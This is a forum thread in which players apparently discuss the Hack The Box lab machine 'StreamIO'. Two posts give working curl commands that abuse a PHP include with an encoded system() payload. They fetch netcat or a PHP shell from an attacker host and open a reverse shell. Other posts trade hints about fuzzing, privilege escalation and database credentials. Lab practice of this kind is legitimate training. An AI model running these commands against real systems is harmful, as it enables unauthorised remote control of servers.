Return to forum

qwerty173 · June 5, 2022 at 1:03 PM

(June 5, 2022, 12:55 PM)dude4695 Wrote: can anyone give me steps to get rev shell ?

Upload netcat onto the target
curl -s -k -X 'POST' -b "PHPSESSID=<YOSHIHIDE_SESSION_ID>" --data-binary "include=data://text/plain;base64,c3lzdGVtKCRfR0VUWydjbWQnXSk7" "https://streamio.htb/admin/?debug=master.php&cmd=certutil.exe+-urlcache+-split+-f+http://<LHOST>/nc.exe+c:\\windows\\temp\
c.exe"

Execute netcat to give us shell
curl -s -k -X 'POST' -b "PHPSESSID=<YOSHIHIDE_SESSION_ID>" --data-binary "include=data://text/plain;base64,c3lzdGVtKCRfR0VUWydjbWQnXSk7" "https://streamio.htb/admin/?debug=master.php&cmd=c:\\windows\\temp\
c.exe+-e+cmd.exe+<LHOST>+<LPORT>"

Himitsu · June 5, 2022 at 1:05 PM

[quote="dude4695" pid="87055" dateline="1654433753"]can anyone give me steps to get rev shell ?[/quote]For example (but there are other ways):1:If your listen port for reverse shell is 1234[code]nc -lvnp 1234[/code]2: In the folder where you have your reverse shell PHP for Windows[code]python3 -m http.server 80[/code]3: RFI to download your reverse shell[code]curl -s -k -X 'POST' -H 'Content-Type: application/x-www-form-urlencoded' -b 'PHPSESSID=' --data-binary "include=data://text/plain;base64,c3lzdGVtKCRfR0VUWydjbWQnXSk7" 'https://streamio.htb/admin/?debug=master.php&cmd=powershell.exe+iwr+-uri+10.10.14.XX/.php+-outfile+"C:\Downloadsshell.php"' | grep '' -A 9999 |grep '

dude4695 · June 5, 2022 at 1:25 PM

Thanks you

tenyuna30739 · June 5, 2022 at 1:40 PM

(June 5, 2022, 11:02 AM)jon01 Wrote:
(June 5, 2022, 08:03 AM)dude4695 Wrote: anyone got user shell ?

check the master.php code via php filter u will see eval()

How did you figure there exists a master.php file?

AndreyGolara · June 5, 2022 at 1:52 PM

(June 5, 2022, 01:40 PM)tenyuna30739 Wrote:
(June 5, 2022, 11:02 AM)jon01 Wrote:
(June 5, 2022, 08:03 AM)dude4695 Wrote: anyone got user shell ?

check the master.php code via php filter u will see eval()

How did you figure there exists a master.php file?

fuzzing

karhu · June 5, 2022 at 1:53 PM

Any hints on privesc? I see Martin is an admin, so I'm assuming that's my first step, but I can't seem to find a vector. :/

Exa · June 5, 2022 at 2:01 PM

Forwarding port 1433, there is a streamio_backup database.

dude4695 · June 5, 2022 at 2:10 PM

that's why i love linux box

karhu · June 5, 2022 at 2:25 PM

(June 5, 2022, 02:01 PM)Exa Wrote: Forwarding port 1433, there is a streamio_backup database.

So, I saw that port 1433 was open on the DC, but when I try to log in with yoshihide or db_user, I get nothing. Maybe I'm missing something obvious, idk.

dude4695 · June 5, 2022 at 2:26 PM

(June 5, 2022, 02:25 PM)karhu Wrote:
(June 5, 2022, 02:01 PM)Exa Wrote: Forwarding port 1433, there is a streamio_backup database.

So, I saw that port 1433 was open on the DC, but when I try to log in with yoshihide or db_user, I get nothing. Maybe I'm missing something obvious, idk.

isn't it db creds are in index.php